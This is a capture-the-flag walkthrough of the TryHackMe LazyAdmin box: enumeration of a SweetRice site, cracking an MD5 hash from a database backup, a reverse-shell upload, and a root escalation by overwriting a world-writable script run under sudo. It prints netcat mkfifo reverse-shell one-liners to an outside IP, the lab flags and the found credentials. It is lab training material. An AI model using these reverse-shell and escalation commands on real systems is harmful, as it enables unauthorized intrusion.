LazyAdmin
Easy linux machine to practice your skills.
Initial Reconnaissance
Service Scanning
┌──(kali㉿kali)-[~/Documents]
└─$ sudo nmap -sV -sC -v lazyadmin.thm
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
HTTP 80
Directory Enumeration
ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://lazyadmin.thm/FUZZ -e .php,.txt -r
/content

The website is running SweetRice - a simple website management.
/content Directory Enumeration
┌──(kali㉿kali)-[~/Documents]
└─$ ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://lazyadmin.thm/FUZZ -e .php,.txt -r
/content/as

/content/changelog.txt

We identify the SweetRice version to be 1.5.0.
/content/images

There’s nothing interesting here.
/content/inc

/content/inc/cache/cache.db
┌──(kali㉿kali)-[~/Desktop]
└─$ file cache.db
cache.db: Berkeley DB (Btree, version 9, little-endian)
┌──(kali㉿kali)-[~/Desktop]
└─$ db_dump cache.db
VERSION=3
format=bytevalue
type=btree
db_pagesize=4096
HEADER=END
64625f61727261795f3265313035323534626532656366656461626163363638363864636563396236
313537353032333430392f
64625f61727261795f6336656162356265366334356438613038383465646535613536633564376433
313537353032333430392f
64625f61727261795f6364326264313238643533396638316637326562376562363331646438306332
313537353032333430392f
DATA=END
/content/inc/cache/lastest.txt

This is the exact version of SweetRice.
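The db_dump output for cache.db above is hex, which hides what the cache actually stores. The following is an added example (not the page's or SweetRice's own code) that parses db_dump's bytevalue format, decodes the key/value pairs, and reads the trailing integer as a Unix timestamp; that the value is an epoch time is an assumption, but it matches the 1575023409 stored in the SQL backup below.

```python
import binascii
from datetime import datetime, timezone

# db_dump output for cache.db as shown on the page; after HEADER=END the hex lines alternate key, value.
DB_DUMP_OUTPUT = """VERSION=3
format=bytevalue
type=btree
db_pagesize=4096
HEADER=END
64625f61727261795f3265313035323534626532656366656461626163363638363864636563396236
313537353032333430392f
64625f61727261795f6336656162356265366334356438613038383465646535613536633564376433
313537353032333430392f
64625f61727261795f6364326264313238643533396638316637326562376562363331646438306332
313537353032333430392f
DATA=END"""

def parse_db_dump(text: str) -> dict:
    """Parse db_dump bytevalue output: header up to HEADER=END, then hex key/value line pairs up to DATA=END."""
    lines = text.splitlines()
    body = lines[lines.index("HEADER=END") + 1:lines.index("DATA=END")]
    if len(body) % 2:
        raise ValueError("odd number of data lines: a key has no value")
    records = {}
    for key_hex, val_hex in zip(body[0::2], body[1::2]):
        key = binascii.unhexlify(key_hex).decode("latin-1")
        val = binascii.unhexlify(val_hex).decode("latin-1")
        records[key] = val
    return records

def cache_timestamps(records: dict) -> dict:
    """Values look like '<epoch>/'; interpret the integer as a UTC Unix time (assumption about the cache layout)."""
    out = {}
    for key, val in records.items():
        epoch = int(val.rstrip("/"))
        out[key] = datetime.fromtimestamp(epoch, tz=timezone.utc).isoformat()
    return out

if __name__ == "__main__":
    for key, when in cache_timestamps(parse_db_dump(DB_DUMP_OUTPUT)).items():
        print(key, when)
```

The keys decode to db_array_<32 hex chars> and every value is the same timestamp, so the cache carries no page content, only when entries were written.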
/content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql
We discover a database backup in the mysql_backup folder. It’s a good idea to search for any usernames or passwords in this file:
┌──(kali㉿kali)-[~/Desktop]
└─$ cat mysql_bakup_20191129023059-1.5.1.sql | grep "user\|pass"
14 => 'INSERT INTO `%--%_options` VALUES(\'1\',\'global_setting\',\'a:17:{s:4:\\"name\\";s:25:\\"Lazy Admin's Website\\";s:6:\\"author\\";s:10:\\"Lazy Admin\\";s:5:\\"title\\";s:0:\\"\\";s:8:\\"keywords\\";s:8:\\"Keywords\\";s:11:\\"description\\";s:11:\\"Description\\";s:5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\";s:5:\\"close\\";i:1;s:9:\\"close_tip\\";s:454:\\"<p>Welcome to SweetRice - Thank your for install SweetRice as your website management system.</p><h1>This site is building now , please come late.</h1><p>If you are the webmaster,please go to Dashboard -> General -> Website setting </p><p>and uncheck the checkbox \\"Site close\\" to open your website.</p><p>More help at <a href=\\"http://www.basic-cms.org/docs/5-things-need-to-be-done-when-SweetRice-installed/\\">Tip for Basic CMS SweetRice installed</a></p>\\";s:5:\\"cache\\";i:0;s:13:\\"cache_expired\\";i:0;s:10:\\"user_track\\";i:0;s:11:\\"url_rewrite\\";i:0;s:4:\\"logo\\";s:0:\\"\\";s:5:\\"theme\\";s:0:\\"\\";s:4:\\"lang\\";s:9:\\"en-us.php\\";s:11:\\"admin_email\\";N;}\',\'1575023409\');',
There’s a password hash:
42f749ade7f9e195bf475f37a44cafcb
Let’s crack it using an online password cracker:

The hash cracks to Password123, which gives us the candidate credentials admin:Password123 or manager:Password123 (the backup names the admin account manager).
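Rather than grepping the backup by eye, the admin name and hash can be pulled out by parsing the PHP-serialized options row. This is an added example, not the page's or SweetRice's own code; the sample row is a constructed, shortened version of the global_setting line above with the same backslash quoting, and the final check confirms the cracker's Password123 result locally against the unsalted MD5 shape of the stored hash.

```python
import hashlib
import re

# Constructed excerpt in the layout of the mysql_bakup_*.sql backup: a PHP array of SQL statements, where the
# global_setting row holds a PHP-serialized options array (only 4 of the real row's 17 keys are kept here).
SAMPLE_BACKUP_LINE = r'''14 => 'INSERT INTO `%--%_options` VALUES(\'1\',\'global_setting\',\'a:4:{s:6:\\"author\\";s:10:\\"Lazy Admin\\";s:5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\";s:5:\\"close\\";i:1;}\',\'1575023409\');','''

def php_unserialize(data: str, i: int = 0):
    """Minimal PHP unserialize for N, i, b, s and a types; returns (value, index just past the value).
    Assumes ASCII text, so PHP's byte lengths in s:<len> equal character lengths."""
    t = data[i]
    if t == "N":                                   # N;
        return None, i + 2
    if t in "ib":                                  # i:<int>;  b:<0|1>;
        end = data.index(";", i)
        n = int(data[i + 2:end])
        return (bool(n) if t == "b" else n), end + 1
    if t == "s":                                   # s:<len>:"<bytes>";
        colon = data.index(":", i + 2)
        length = int(data[i + 2:colon])
        start = colon + 2                          # skip :"
        return data[start:start + length], start + length + 2   # skip ";
    if t == "a":                                   # a:<count>:{<key><value>...}
        colon = data.index(":", i + 2)
        count = int(data[i + 2:colon])
        j, items = colon + 2, {}                   # skip :{
        for _ in range(count):
            k, j = php_unserialize(data, j)
            v, j = php_unserialize(data, j)
            items[k] = v
        return items, j + 1                        # skip }
    raise ValueError(f"unsupported type {t!r} at offset {i}")

def settings_from_backup(line: str) -> dict:
    """Undo the backup's backslash quoting of quotes and parse the first serialized array in the line."""
    text = line.replace('\\\\"', '"').replace("\\'", "'")
    m = re.search(r"a:\d+:\{", text)
    if not m:
        raise ValueError("no serialized options array in line")
    return php_unserialize(text, m.start())[0]

def admin_credentials(line: str) -> tuple:
    """Return (admin username, stored password hash) from a global_setting backup row."""
    s = settings_from_backup(line)
    return s["admin"], s["passwd"]

def is_unsalted_md5(candidate: str, digest: str) -> bool:
    """32 lowercase hex chars and no salt: plain MD5, which is why a lookup table cracks it instantly."""
    return bool(re.fullmatch(r"[0-9a-f]{32}", digest)) and hashlib.md5(candidate.encode()).hexdigest() == digest
```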
Dashboard Authenticated as manager
Logging in as the user manager gives us our initial access.

After some dashboard enumeration, we discover an arbitrary file upload vulnerability in the Media Center.
Let’s exploit this to upload our reverse shell:


Shell as www-data

user.txt
www-data@THM-Chal:/$ cd /home
cd /home
www-data@THM-Chal:/home$ ls -la
ls -la
total 12
drwxr-xr-x 3 root root 4096 Nov 29 2019 .
drwxr-xr-x 23 root root 4096 Nov 29 2019 ..
drwxr-xr-x 18 itguy itguy 4096 Nov 30 2019 itguy
www-data@THM-Chal:/home$ cd itguy
cd itguy
www-data@THM-Chal:/home/itguy$ ls -la
ls -la
total 148
drwxr-xr-x 18 itguy itguy 4096 Nov 30 2019 .
drwxr-xr-x 3 root root 4096 Nov 29 2019 ..
-rw------- 1 itguy itguy 1630 Nov 30 2019 .ICEauthority
-rw------- 1 itguy itguy 53 Nov 30 2019 .Xauthority
lrwxrwxrwx 1 root root 9 Nov 29 2019 .bash_history -> /dev/null
-rw-r--r-- 1 itguy itguy 220 Nov 29 2019 .bash_logout
-rw-r--r-- 1 itguy itguy 3771 Nov 29 2019 .bashrc
drwx------ 13 itguy itguy 4096 Nov 29 2019 .cache
drwx------ 14 itguy itguy 4096 Nov 29 2019 .config
drwx------ 3 itguy itguy 4096 Nov 29 2019 .dbus
-rw-r--r-- 1 itguy itguy 25 Nov 29 2019 .dmrc
drwx------ 2 itguy itguy 4096 Nov 29 2019 .gconf
drwx------ 3 itguy itguy 4096 Nov 30 2019 .gnupg
drwx------ 3 itguy itguy 4096 Nov 29 2019 .local
drwx------ 5 itguy itguy 4096 Nov 29 2019 .mozilla
-rw------- 1 itguy itguy 149 Nov 29 2019 .mysql_history
drwxrwxr-x 2 itguy itguy 4096 Nov 29 2019 .nano
-rw-r--r-- 1 itguy itguy 655 Nov 29 2019 .profile
-rw-r--r-- 1 itguy itguy 0 Nov 29 2019 .sudo_as_admin_successful
-rw-r----- 1 itguy itguy 5 Nov 30 2019 .vboxclient-clipboard.pid
-rw-r----- 1 itguy itguy 5 Nov 30 2019 .vboxclient-display.pid
-rw-r----- 1 itguy itguy 5 Nov 30 2019 .vboxclient-draganddrop.pid
-rw-r----- 1 itguy itguy 5 Nov 30 2019 .vboxclient-seamless.pid
-rw------- 1 itguy itguy 82 Nov 30 2019 .xsession-errors
-rw------- 1 itguy itguy 82 Nov 29 2019 .xsession-errors.old
drwxr-xr-x 2 itguy itguy 4096 Nov 29 2019 Desktop
drwxr-xr-x 2 itguy itguy 4096 Nov 29 2019 Documents
drwxr-xr-x 2 itguy itguy 4096 Nov 29 2019 Downloads
drwxr-xr-x 2 itguy itguy 4096 Nov 29 2019 Music
drwxr-xr-x 2 itguy itguy 4096 Nov 29 2019 Pictures
drwxr-xr-x 2 itguy itguy 4096 Nov 29 2019 Public
drwxr-xr-x 2 itguy itguy 4096 Nov 29 2019 Templates
drwxr-xr-x 2 itguy itguy 4096 Nov 29 2019 Videos
-rw-r--r-x 1 root root 47 Nov 29 2019 backup.pl
-rw-r--r-- 1 itguy itguy 8980 Nov 29 2019 examples.desktop
-rw-rw-r-- 1 itguy itguy 16 Nov 29 2019 mysql_login.txt
-rw-rw-r-- 1 itguy itguy 38 Nov 29 2019 user.txt
www-data@THM-Chal:/home/itguy$ cat user.txt
cat user.txt
THM{63e5bce9271952aad1113b6f1ac28a07}
MySQL Credentials
www-data@THM-Chal:/home/itguy$ cat mysql_login.txt
cat mysql_login.txt
rice:randompass
Sudo Permissions
www-data@THM-Chal:/home/itguy$ sudo -l
sudo -l
Matching Defaults entries for www-data on THM-Chal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on THM-Chal:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
www-data@THM-Chal:/home/itguy$ cat /home/itguy/backup.pl
cat /home/itguy/backup.pl
#!/usr/bin/perl
system("sh", "/etc/copy.sh");
www-data@THM-Chal:/home/itguy$ cat /etc/copy.sh
cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
www-data@THM-Chal:/home/itguy$ ls -la /etc/copy.sh
ls -la /etc/copy.sh
-rw-r--rwx 1 root root 81 Nov 29 2019 /etc/copy.sh
backup.pl itself is root-owned and not writable, but /etc/copy.sh, which it runs via sh, is world-writable. We can overwrite /etc/copy.sh and have sudo perl backup.pl execute arbitrary commands as the root user.
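As an added defender-side check (not the page's own code), the following script takes a file that a sudo rule lets run as root, lists the absolute paths it references, and flags any the script or its dependencies that a non-root user could modify. The demo rebuilds the backup.pl / copy.sh permissions in a temporary directory, so the filenames are constructed and the current uid stands in for root as the trusted owner; on a real host you would call audit_sudo_script on the sudoers target with the default trusted uid 0.

```python
import os
import re
import stat
import tempfile

ABS_PATH = re.compile(r"(/[\w./-]+)")

def referenced_paths(script_text: str) -> list:
    """Absolute paths a script mentions, e.g. /etc/copy.sh in system("sh", "/etc/copy.sh")."""
    return sorted(set(ABS_PATH.findall(script_text)))

def risky_mode(path: str, trusted_uids=(0,)):
    """Why a file run under a root sudo rule could be altered by someone else, or None if it cannot."""
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return "symlink: target can be swapped"
    if st.st_uid not in trusted_uids:
        return f"owned by uid {st.st_uid}, not a trusted uid"
    if st.st_mode & stat.S_IWOTH:
        return "world-writable"
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        return f"group-writable (gid {st.st_gid})"
    return None

def audit_sudo_script(script_path: str, trusted_uids=(0,)) -> dict:
    """Check the script and every existing absolute path it references; return {path: reason}."""
    with open(script_path) as f:
        candidates = [script_path] + referenced_paths(f.read())
    findings = {}
    for p in candidates:
        if os.path.lexists(p):
            reason = risky_mode(p, trusted_uids)
            if reason:
                findings[p] = reason
    return findings

def demo() -> dict:
    """Constructed copy of the LazyAdmin layout: backup.pl (-rw-r--r-x) calls copy.sh (-rw-r--rwx).
    Both files belong to the current user, so that uid is passed as trusted in place of root."""
    d = tempfile.mkdtemp()
    copy_sh, backup_pl = os.path.join(d, "copy.sh"), os.path.join(d, "backup.pl")
    with open(copy_sh, "w") as f:
        f.write("echo backup\n")
    os.chmod(copy_sh, 0o647)
    with open(backup_pl, "w") as f:
        f.write(f'#!/usr/bin/perl\nsystem("sh", "{copy_sh}");\n')
    os.chmod(backup_pl, 0o645)
    return audit_sudo_script(backup_pl, trusted_uids=(0, os.getuid()))
```

The fix the audit points at is to remove the other-write bit on /etc/copy.sh (chmod o-w) so only root can change what the sudo rule ends up executing.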
Shell as root
www-data@THM-Chal:/home/itguy$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.17.21.52 4244 >/tmp/f" > /etc/copy.sh
www-data@THM-Chal:/home/itguy$ cat /etc/copy.sh
cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.17.21.52 4244 >/tmp/f
www-data@THM-Chal:/home/itguy$ sudo /usr/bin/perl /home/itguy/backup.pl
sudo /usr/bin/perl /home/itguy/backup.pl
root.txt
root@THM-Chal:/home/itguy# cd /root
cd /root
root@THM-Chal:~# ls -la
ls -la
total 28
drwxr-x--- 4 root root 4096 aug 19 14:34 .
drwxr-xr-x 23 root root 4096 nov 29 2019 ..
lrwxrwxrwx 1 root root 9 nov 29 2019 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 oct 22 2015 .bashrc
drwx------ 2 root root 4096 feb 27 2019 .cache
drwxr-xr-x 2 root root 4096 nov 29 2019 .nano
-rw-r--r-- 1 root root 148 aug 17 2015 .profile
-rw-r--r-- 1 root root 38 nov 29 2019 root.txt
root@THM-Chal:~# cat root.txt
cat root.txt
THM{6637f41d0177b6f37cb20d775124699f}